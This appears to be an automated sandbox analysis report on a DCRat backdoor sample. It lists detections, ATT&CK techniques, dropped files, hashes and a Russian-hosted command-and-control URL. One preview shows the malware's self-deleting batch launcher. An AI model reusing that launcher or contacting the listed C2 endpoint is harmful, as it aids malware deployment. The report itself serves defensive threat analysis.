                  Source: Yara matchFile source: 0.0.lfcdgbuksf.exe.960000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4162410596.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4162410596.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.1679174176.0000000000962000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: lfcdgbuksf.exe PID: 7440, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: staticfile.exe PID: 7740, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\staticfile.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts141
                  Windows Management Instrumentation                  		1
                  Scripting                  		12
                  Process Injection                  		11
                  Masquerading                  		OS Credential Dumping341
                  Security Software Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Non-Application Layer Protocol                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
                  Virtualization/Sandbox Evasion                  		Security Account Manager251
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive11
                  Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  Remote System Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                  Obfuscated Files or Information                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Software Packing                  		DCSync1
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc Filesystem135
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1565846 Sample: lfcdgbuksf.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Antivirus detection for dropped file 2->46 48 10 other signatures 2->48 7 lfcdgbuksf.exe 4 16 2->7         started        process3 file4 24 C:\Users\user\Desktop\vZNEzLck.log, PE32 7->24 dropped 26 C:\Users\user\Desktop\hADxImWJ.log, PE32 7->26 dropped 28 C:\Users\user\Desktop\dNlyfpHV.log, PE32 7->28 dropped 30 8 other malicious files 7->30 dropped 10 cmd.exe 1 7->10         started        process5 signatures6 50 Uses ping.exe to sleep 10->50 52 Uses ping.exe to check the status of other devices and networks 10->52 13 staticfile.exe 14 9 10->13         started        18 conhost.exe 10->18         started        20 PING.EXE 1 10->20         started        22 chcp.com 1 10->22         started        process7 dnsIp8 40 213.108.22.118, 49731, 49733, 49736 SPEEDYLINERU Russian Federation 13->40 32 C:\Users\user\Desktop\vXIDvyqF.log, PE32 13->32 dropped 34 C:\Users\user\Desktop\smdnokfM.log, PE32 13->34 dropped 36 C:\Users\user\Desktop\jDKXEIae.log, PE32 13->36 dropped 38 4 other malicious files 13->38 dropped 54 Antivirus detection for dropped file 13->54 56 Multi AV Scanner detection for dropped file 13->56 58 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->58 60 2 other signatures 13->60 file9 signatures10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  lfcdgbuksf.exe66%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                  lfcdgbuksf.exe100%AviraHEUR/AGEN.1309961
                  lfcdgbuksf.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\staticfile.exe100%AviraHEUR/AGEN.1309961
                  C:\Users\user\AppData\Local\Temp\5hJc6iFcNs.bat100%AviraBAT/Delbat.C
                  C:\Users\user\Desktop\DDWtiErR.log100%AviraTR/AVI.Agent.updqb
                  C:\Users\user\Desktop\BRqdbrgY.log100%AviraTR/Agent.jbwuj
                  C:\Users\user\Desktop\EGcTfavm.log100%AviraTR/AVI.Agent.updqb
                  C:\Users\user\Desktop\MEQTIppb.log100%AviraTR/Agent.jbwuj
                  C:\Users\user\AppData\Local\staticfile.exe100%Joe Sandbox ML
                  C:\Users\user\Desktop\dNlyfpHV.log100%Joe Sandbox ML
                  C:\Users\user\Desktop\ZFopJXMZ.log100%Joe Sandbox ML
                  C:\Users\user\Desktop\aIuPGtQu.log100%Joe Sandbox ML
                  C:\Users\user\Desktop\eQsYbLKq.log100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\staticfile.exe66%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                  C:\Users\user\Desktop\BRqdbrgY.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                  C:\Users\user\Desktop\DDWtiErR.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                  C:\Users\user\Desktop\EGcTfavm.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                  C:\Users\user\Desktop\MEQTIppb.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                  C:\Users\user\Desktop\YRkhYJRb.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                  C:\Users\user\Desktop\ZFopJXMZ.log16%ReversingLabs
                  C:\Users\user\Desktop\aIuPGtQu.log16%ReversingLabs
                  C:\Users\user\Desktop\dNlyfpHV.log5%ReversingLabs
                  C:\Users\user\Desktop\eQsYbLKq.log5%ReversingLabs
                  C:\Users\user\Desktop\hADxImWJ.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                  C:\Users\user\Desktop\jDKXEIae.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                  C:\Users\user\Desktop\smdnokfM.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                  C:\Users\user\Desktop\vXIDvyqF.log17%ReversingLabs
                  C:\Users\user\Desktop\vZNEzLck.log17%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://213.108.22.1180%Avira URL Cloudsafe
                  http://213.108.22.118/0%Avira URL Cloudsafe
                  http://213.108.22.118/protectlinuxuniversaltrackcdn.php0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://213.108.22.118/protectlinuxuniversaltrackcdn.phptrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://213.108.22.118staticfile.exe, 00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.000000000284E000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.000000000274E000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002601000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002AEC000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namelfcdgbuksf.exe, 00000000.00000002.1737239542.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002601000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://213.108.22.118/staticfile.exe, 00000006.00000002.4162410596.0000000002601000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    213.108.22.118
                    		unknownRussian Federation
                    		49342SPEEDYLINERUtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1565846
                    Start date and time:2024-11-30 22:34:35 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 55s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:lfcdgbuksf.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@10/21@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 52%
                    • Number of executed functions: 129
                    • Number of non-executed functions: 8
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • VT rate limit hit for: lfcdgbuksf.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    16:35:44API Interceptor9759394x Sleep call for process: staticfile.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    SPEEDYLINERUsora.m68k.elfGet hashmaliciousMiraiBrowse
                    • 91.219.224.245
                    Document-v16-59-16.jsGet hashmaliciousUnknownBrowse
                    • 213.108.22.104
                    Document-v16-59-16.jsGet hashmaliciousUnknownBrowse
                    • 213.108.22.104
                    CNNuVrT9Dm.exeGet hashmaliciousNjratBrowse
                    • 176.109.107.2
                    QtON0L47XD.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                    • 176.109.101.167
                    firmware.i686.elfGet hashmaliciousUnknownBrowse
                    • 178.215.96.174
                    botx.x86.elfGet hashmaliciousMiraiBrowse
                    • 176.114.120.113
                    2GAcJejuxn.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, zgRATBrowse
                    • 176.123.161.158
                    C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 176.123.168.151
                    NMdpQecbkg.elfGet hashmaliciousMiraiBrowse
                    • 213.108.22.242

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Users\user\Desktop\BRqdbrgY.logkyhjasehs.exeGet hashmaliciousDCRatBrowse
                      qNdO4D18CF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        iN1fhAtzW2.exeGet hashmaliciousDCRatBrowse
                          based.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                            KPFv8ATDx0.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              T0jSGXdxX5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                  file_1443.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    lsass.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      t8xf0Y1ovi.exeGet hashmaliciousDCRatBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\9e85d929f61550

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:ASCII text, with very long lines (957), with no line terminators
                                        Category:dropped
                                        Size (bytes):957
                                        Entropy (8bit):5.901705637590559
                                        Encrypted:false
                                        SSDEEP:24:CR0ISG3h6vkvkA4dLolHyp3QX7jmEV0kl14YNy:e0LA4dLoZg3QP0kl14Yk
                                        MD5:8BBB0CAA10D315C69062FAE2693CBE0E
                                        SHA1:7FA9AAB7443F667D1714270097BC160DF917821D
                                        SHA-256:3A1DC5AE1984411745AC316F2CD22F4A0A4B473D98E4D0E0B93BD959646F1A47
                                        SHA-512:04F5C50D400F8FA3AFE66DF469B9DBEF5894F142D061201B1FA2F8A76C14EF868121E11057D19DFEF6094F5568CDD4FCEE4DEA9E918DC9FE85BE8A2725C881A4
                                        Malicious:false
                                        Reputation:low
                                        Preview:5KekJQb8z7FOa7e2xovNkrJgAMPfPA1iwoUucX7bnqC8XErwM7nZqUWOB7j7A5tzGhbvntZZqTj4pKJ6edTRWc1bSGtex9br7M2zm6JchNsWubj0yndhlbcnp9cgA4lq217cSTTiT0tJter0h2qKg4FgtOJmdmbnlBe2eGieU4NvrT4LSm9IObJ7vasDJrFrYGhrAyVaTLzmrUyaU8T1nTZJ1gGDXfVmzgWkvMKeQiyClhQbmStLXODEqXzerRCy0MxK8NoIyzkEfXiUPpbFvJPlcR4YWqw8f9MYuGcYnlWhn9jTzfOC06Dq7LsqTQvHDmifLJkJMDcKxr8crki1ctIi6fbiXvEXzPeAaDIq5Fzwe23PNP8tr4pTe9jprBva8FUhN7Bob25W4VEDmLUIwUp5kKgbed83UYxZiWBQNUSz8SZI5fDfqmonaZ7DakJ83CCfhpfQJE4cCz6RvXf9ZcMruK9IY80nKU56Q3lQ9xWmsLlkdpSCEKiazVvXpX1LNRRs39B1wP9mGk9iiYptqxiAvfH4INkm6KYa42qdoaPzK5UPWMyRrHeatR6Y1GsipXq5LioqrLFPhtz0K2i5ZT4yq8rn5RlhrqKxPYDxiIjfCO2AcGO9hxJVc1PM0Auakhh1iBkwyuWRtZvbGrKzDm94hyVXJ06hXJ5erBbbfcKxa2lDFyGJ05W8inUuqMm7xz4kdQuFQtTlbMeoMRRUuxrbx76DrquTzM9k8BjyEB3GmugVJpiY4SNAHcxgUqYj8AwON3qLrdQt3kzCak4BIVYg98dgNDeXnUIm7RIP9XqbBeGhnuFtvWamlPPOaJ7o82GjcNFJcoCvp6ff152d7vlQ4fArB3zzZCdJXhFZp6QHUo7puuWeQdrMQzp7NXHizMVmdWHU0dxBee6PhV7RgUi5VQ2i2IMRysRISVLYmCoxppsv3ZZ1a0BenZRMd

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\lfcdgbuksf.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1698
                                        Entropy (8bit):5.367720686892084
                                        Encrypted:false
                                        SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                        MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                        SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                        SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                        SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                        Malicious:true
                                        Reputation:moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                        C:\Users\user\AppData\Local\Temp\5hJc6iFcNs.bat

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):171
                                        Entropy (8bit):4.99192299468539
                                        Encrypted:false
                                        SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5WRwxLCvBktKcKZG1t+kiE2J5xAILGsHn:hCRLuVFOOr+DE1wkn23WCCvKOZG1wknw
                                        MD5:2809DEBCBBB470EA8CC34757917A5562
                                        SHA1:2F65BE6349D96791B8C6136F51947D46A1D144EF
                                        SHA-256:646C0574F93576ECCDFEB87FAAC1D4CBD24D94D2EE4AEA4E6B30464E2B8E2E5F
                                        SHA-512:7BD3581D8C56E60DA73EE74DB439C74A3B817B62673996D994ED07CB41D7CB12654CA6C3E07BB74BBC5D02CE78668AB5CBBAB5BFDED7C27C0F87EC5702D7B13A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Reputation:low
                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\staticfile.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\5hJc6iFcNs.bat"

                                        C:\Users\user\AppData\Local\Temp\csQgNwNy6M

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):25
                                        Entropy (8bit):4.243856189774724
                                        Encrypted:false
                                        SSDEEP:3:60Ea8:615
                                        MD5:C8DDA9FA63FD9D99A5523EECBDD85ABD
                                        SHA1:B38AE33450A43B25814496A8E28B89E970DCD5C0
                                        SHA-256:580D147824BDDA185A54E73365D46E0DBC703BFF041B6DCCE870599825758B49
                                        SHA-512:C79F3D2039C776091FF104B982DB9120A759FD6B586AE35245AFFC113C826E94977F1F0EEE96BB6D1063476E5C136AC88C9DA7E1017852C3E08D97ED19A61956
                                        Malicious:false
                                        Reputation:low
                                        Preview:JioequQphGocsU18qxe2D84Dk

                                        C:\Users\user\AppData\Local\staticfile.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1657344
                                        Entropy (8bit):4.891536930486634
                                        Encrypted:false
                                        SSDEEP:24576:o2a0H/WPj+rsO6AOhaDxL/aySUYj79FcPX6t1:va0SKsOP1L/KzEP
                                        MD5:8C6E4C86C216B898F24FF14B417C4369
                                        SHA1:266E7D01BA11CD7914451C798199596F4D2F7B53
                                        SHA-256:858FFF104DA670B640EFF2A93B7FA4B794AE554C30A409864D00F3B7ECC1E09F
                                        SHA-512:3F6416BF0B7989B522D399E151CC755783B9B7AFE9CDE559F8207FAD6C043E24F85B22C3A583329E1620E862C7824249C536209B6BE5E093A2B580C2FC52F660
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\staticfile.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 66%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."......B..........N`... ........@.. ....................................@.................................._..S.......p............................................................................ ............... ..H............text...T@... ...B.................. ..`.rsrc...p............D..............@..@.reloc...............H..............@..B................0`......H...........X...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                        C:\Users\user\AppData\Local\staticfile.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\Desktop\BRqdbrgY.log

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):342528
                                        Entropy (8bit):6.170134230759619
                                        Encrypted:false
                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 50%
                                        Joe Sandbox View:
                                        • Filename: kyhjasehs.exe, Detection: malicious, Browse
                                        • Filename: qNdO4D18CF.exe, Detection: malicious, Browse
                                        • Filename: iN1fhAtzW2.exe, Detection: malicious, Browse
                                        • Filename: based.exe, Detection: malicious, Browse
                                        • Filename: KPFv8ATDx0.exe, Detection: malicious, Browse
                                        • Filename: T0jSGXdxX5.exe, Detection: malicious, Browse
                                        • Filename: main.exe, Detection: malicious, Browse
                                        • Filename: file_1443.exe, Detection: malicious, Browse
                                        • Filename: lsass.exe, Detection: malicious, Browse
                                        • Filename: t8xf0Y1ovi.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                        C:\Users\user\Desktop\DDWtiErR.log

                                        Download File
                                        Process:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):69632
                                        Entropy (8bit):5.932541123129161
                                        Encrypted:false
                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 50%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                        C:\Users\user\Desktop\EGcTfavm.log

                                        Download File
                                        Process:C:\Users\user\AppData\Local\staticfile.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):69632
                                        Entropy (8bit):5.932541123129161
                                        Encrypted:false
                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 50%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                        C:\Users\user\Desktop\MEQTIppb.log

                                        Download File
                                        Process:C:\Users\user\AppData\Local\staticfile.exe
